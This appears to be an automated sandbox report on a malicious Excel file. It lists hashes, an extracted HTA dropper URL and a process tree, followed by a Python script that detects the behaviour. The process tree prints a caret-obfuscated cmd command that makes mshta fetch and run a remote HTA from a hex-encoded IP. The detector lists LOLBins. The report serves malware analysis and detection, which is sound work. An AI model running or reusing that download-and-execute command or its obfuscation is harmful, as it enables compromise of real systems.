Analysis

  • max time kernel
    130s
  • max time network
    133s
  • platform
    windows10_x64
  • resource
    win10-en-20211208
  • submitted
    19-01-2022 12:55

General

  • Target

    c48a780e4664704fea5ddb053288a405a134644cd21cf1b2a21050df56d28d94.xls

  • Size

    142KB

  • MD5

    8d6b43ca03cf1e4d675a523c4b06e214

  • SHA1

    6cdde32cd5ce069e00c952575714e66c55f091cc

  • SHA256

    c48a780e4664704fea5ddb053288a405a134644cd21cf1b2a21050df56d28d94

  • SHA512

    600dc0d8cd18517e49c8319c8a7e9feb8cdd6354d80ff1c0b7e99ccdbd9fc3651b30c07448792fd7b52ec877068d72a2c664c2e79ca8fcdfd542ff6f1c8f7418

Score
10/10

Malware Config

Extracted

  • Language: hta
  • Source: URLs
  • hta.dropper: http://0xb907d607/fer/fer.html

Signatures

  • Process spawned unexpected child process (1 IoC)

    This typically indicates the parent process was compromised via an exploit or macro. Here EXCEL.EXE (PID 3716) spawns cmd.exe (PID 2020), see Processes below.

  • Blocklisted process makes network request (1 IoC)

    mshta.exe (PID 1868) fetches the HTA from the URL in the extracted config.

  • Checks processor information in registry (2 TTPs, 3 IoCs)

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry (2 TTPs, 3 IoCs)
  • Suspicious behavior: AddClipboardFormatListener (1 IoC)
  • Suspicious use of SetWindowsHookEx (13 IoCs)
  • Suspicious use of WriteProcessMemory (6 IoCs)

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\c48a780e4664704fea5ddb053288a405a134644cd21cf1b2a21050df56d28d94.xls"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3716
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2156
      • C:\Windows\SYSTEM32\cmd.exe
        cmd /c m^sh^t^a h^tt^p^:/^/0xb907d607/fer/fer.html
        2⤵
        • Process spawned unexpected child process
        • Suspicious use of WriteProcessMemory
        PID:2020
        • C:\Windows\system32\mshta.exe
          mshta http://0xb907d607/fer/fer.html
          3⤵
          • Blocklisted process makes network request
          PID:1868
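The cmd.exe command line above is worth a second look: the carets in `m^sh^t^a h^tt^p^:/^/...` are cmd.exe escape characters that are dropped before the child is launched, so the string never contains `mshta` or `http://` literally, and the host `0xb907d607` is a dotless hexadecimal IPv4 address, which WinINet/urlmon and browsers accept in the inet_aton style (hex, decimal or octal) but which defeats naive IP or domain matching. The following script is an added example, not part of the sandbox report: it strips cmd.exe caret escaping, normalises such hosts to a dotted quad (185.7.214.7 is arithmetic on the hex value, the report itself does not state it), and flags the Office -> cmd -> mshta chain over a constructed event list built from the process tree above (the parent PID of EXCEL.EXE is not in the report and is set to None).

```python
"""Added example: de-obfuscate the cmd.exe command line from the report,
normalise the dotless-hex host, and flag the Office -> LOLBin chain."""
import ipaddress
import re
from urllib.parse import urlsplit

# Command line exactly as recorded for PID 2020 in the report.
CMDLINE = "cmd /c m^sh^t^a h^tt^p^:/^/0xb907d607/fer/fer.html"

# Constructed process events mirroring the report's process tree.
# ppid of EXCEL.EXE is not recorded in the report, so it is None here.
EVENTS = [
    {"pid": 3716, "ppid": None, "image": r"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE",
     "cmdline": r'"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" '
                r'"C:\Users\Admin\AppData\Local\Temp\c48a780e....xls"'},
    {"pid": 2156, "ppid": 3716, "image": r"C:\Windows\splwow64.exe",
     "cmdline": r"C:\Windows\splwow64.exe 12288"},
    {"pid": 2020, "ppid": 3716, "image": r"C:\Windows\SYSTEM32\cmd.exe", "cmdline": CMDLINE},
    {"pid": 1868, "ppid": 2020, "image": r"C:\Windows\system32\mshta.exe",
     "cmdline": "mshta http://0xb907d607/fer/fer.html"},
]

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
LOLBINS = {"cmd.exe", "mshta.exe", "powershell.exe", "wscript.exe", "cscript.exe",
           "rundll32.exe", "regsvr32.exe", "certutil.exe"}


def strip_cmd_carets(cmdline: str) -> str:
    """cmd.exe treats ^ as an escape outside double quotes: '^X' becomes 'X'.
    Stripping it recovers the tokens the child process actually receives."""
    out, in_quotes, i = [], False, 0
    while i < len(cmdline):
        c = cmdline[i]
        if c == '"':
            in_quotes = not in_quotes
            out.append(c)
        elif c == "^" and not in_quotes:
            if i + 1 < len(cmdline):      # escaped char survives, caret does not
                out.append(cmdline[i + 1])
                i += 1
            # a trailing caret is a line continuation: drop it
        else:
            out.append(c)
        i += 1
    return "".join(out)


def normalize_host(host: str) -> str:
    """Turn inet_aton-style hosts (dotless hex 0xb907d607, dotless decimal,
    dotless octal) into a dotted quad; anything else is returned unchanged."""
    h = host.lower()
    try:
        if h.startswith("0x"):
            n = int(h, 16)
        elif len(h) > 1 and h.startswith("0") and h.isdigit():
            n = int(h, 8)
        elif h.isdigit():
            n = int(h, 10)
        else:
            return host
    except ValueError:
        return host
    if n > 0xFFFFFFFF:
        return host
    return str(ipaddress.IPv4Address(n))


def extract_urls(cmdline: str):
    """URLs from a de-obfuscated command line, with the host normalised."""
    deob = strip_cmd_carets(cmdline)
    found = []
    for u in re.findall(r"https?://[^\s\"']+", deob, re.I):
        host = urlsplit(u).hostname or ""
        found.append({"raw": u, "host": host, "resolved_host": normalize_host(host)})
    return found


def flag_office_child_chains(events):
    """Flag LOLBin processes that have an Office application among their
    ancestors; returns one hit per process with the chain and any URLs."""
    by_pid = {e["pid"]: e for e in events}
    name = lambda e: e["image"].rsplit("\\", 1)[-1].lower()
    hits = []
    for e in events:
        if name(e) not in LOLBINS:
            continue
        chain, seen, p = [e], {e["pid"]}, by_pid.get(e["ppid"])
        while p is not None and p["pid"] not in seen:   # guard against ppid cycles
            chain.append(p)
            seen.add(p["pid"])
            p = by_pid.get(p["ppid"])
        if any(name(a) in OFFICE_APPS for a in chain[1:]):
            hits.append({"pid": e["pid"],
                         "chain": " -> ".join(name(a) for a in reversed(chain)),
                         "urls": extract_urls(e["cmdline"])})
    return hits


if __name__ == "__main__":
    for hit in flag_office_child_chains(EVENTS):
        print(hit["pid"], hit["chain"], [u["resolved_host"] for u in hit["urls"]])
```

Both the caret stripping and the host normalisation matter for detection: a rule that matches on the literal `mshta` or on `0xb907d607` as a string would miss either a differently-placed caret or the same address written in decimal, so match on the de-obfuscated token and on the numeric address.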

Network

MITRE ATT&CK Matrix (ATT&CK v6)

  • Discovery
    • Query Registry (T1012): 2
    • System Information Discovery (T1082): 2


Downloads

  • memory/3716-115-0x00007FFF7B1F0000-0x00007FFF7B200000-memory.dmp (Filesize 64KB)
  • memory/3716-116-0x00007FFF7B1F0000-0x00007FFF7B200000-memory.dmp (Filesize 64KB)
  • memory/3716-117-0x00007FFF7B1F0000-0x00007FFF7B200000-memory.dmp (Filesize 64KB)
  • memory/3716-118-0x00007FFF7B1F0000-0x00007FFF7B200000-memory.dmp (Filesize 64KB)
  • memory/3716-119-0x00007FFF7B1F0000-0x00007FFF7B200000-memory.dmp (Filesize 64KB)
  • memory/3716-128-0x00007FFF786A0000-0x00007FFF786B0000-memory.dmp (Filesize 64KB)
  • memory/3716-129-0x00007FFF786A0000-0x00007FFF786B0000-memory.dmp (Filesize 64KB)
  • memory/3716-513-0x00007FFF7B1F0000-0x00007FFF7B200000-memory.dmp (Filesize 64KB)
  • memory/3716-514-0x00007FFF7B1F0000-0x00007FFF7B200000-memory.dmp (Filesize 64KB)
  • memory/3716-515-0x00007FFF7B1F0000-0x00007FFF7B200000-memory.dmp (Filesize 64KB)
  • memory/3716-516-0x00007FFF7B1F0000-0x00007FFF7B200000-memory.dmp (Filesize 64KB)